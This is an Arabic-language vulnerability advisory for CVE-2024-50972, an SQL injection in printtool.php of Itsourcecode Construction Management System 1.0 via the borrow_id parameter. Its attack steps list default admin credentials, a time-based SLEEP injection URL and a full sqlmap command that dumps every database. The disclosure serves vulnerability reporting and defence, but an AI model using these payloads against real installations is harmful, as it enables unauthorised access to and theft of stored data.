CVE-2024-50972
الوصف
ثغرة حقن SQL في ملف printtool.php الخاص بـ Itsourcecode Construction Management System 1.0 تسمح للمهاجمين عن بُعد بتنفيذ أوامر SQL تعسفية عبر معامل borrow_id.
نوع الثغرة
حقن SQL
بائع المنتج
Itsourcecode
قاعدة كود المنتج المتأثر:
https://itsourcecode.com/free-projects/php-project/construction-management-system-project-in-php-with-source-code/ - 1.0
المكون المتأثر:
نظام Itsourcecode لإدارة الإنشاءات الإصدار 1.0 معرض لحقن SQL عبر معامل borrow_id في صفحة printtool.php
نواقل الهجوم:
- قم بإعداد التطبيق محليًا، وسجل الدخول ببيانات المسؤول admin:admin
- انتقل إلى عنوان URL التالي في متصفحك:
http://localhost/monitoring_system/printtool.php?borrow_id=5
- حقن حمولة SQL:
قم بتعديل معامل borrow_id في عنوان URL ليشمل حمولة حقن SQL تعتمد على الوقت.
http://localhost/monitoring_system/printtool.php?borrow_id=5'+AND+(SELECT+7254+FROM+(SELECT(SLEEP(20)))rcGT)--+xxQB
- لاحظ استجابة التطبيق:
يجب أن يستغرق تحميل الصفحة وقتًا أطول بشكل ملحوظ (20 ثانية) إذا كان الحقن ناجحًا، مما يؤكد أن معامل borrow_id معرض لحقن SQL.
- استخدم الآن أداة SQLMap لمزيد من الاستغلال وتفريغ قواعد البيانات باستخدام الأمر التالي:
sqlmap.py -u http://localhost/monitoring_system/printtool.php?borrow_id=5 --risk 3 --level 3 --cookie="PHPSESSID=your_cookie_here" --dbs --technique=T --dump --no-cast
المرجع:
- https://itsourcecode.com/free-projects/php-project/construction-management-system-project-in-php-with-source-code/
- https://owasp.org/www-community/attacks/SQL_Injection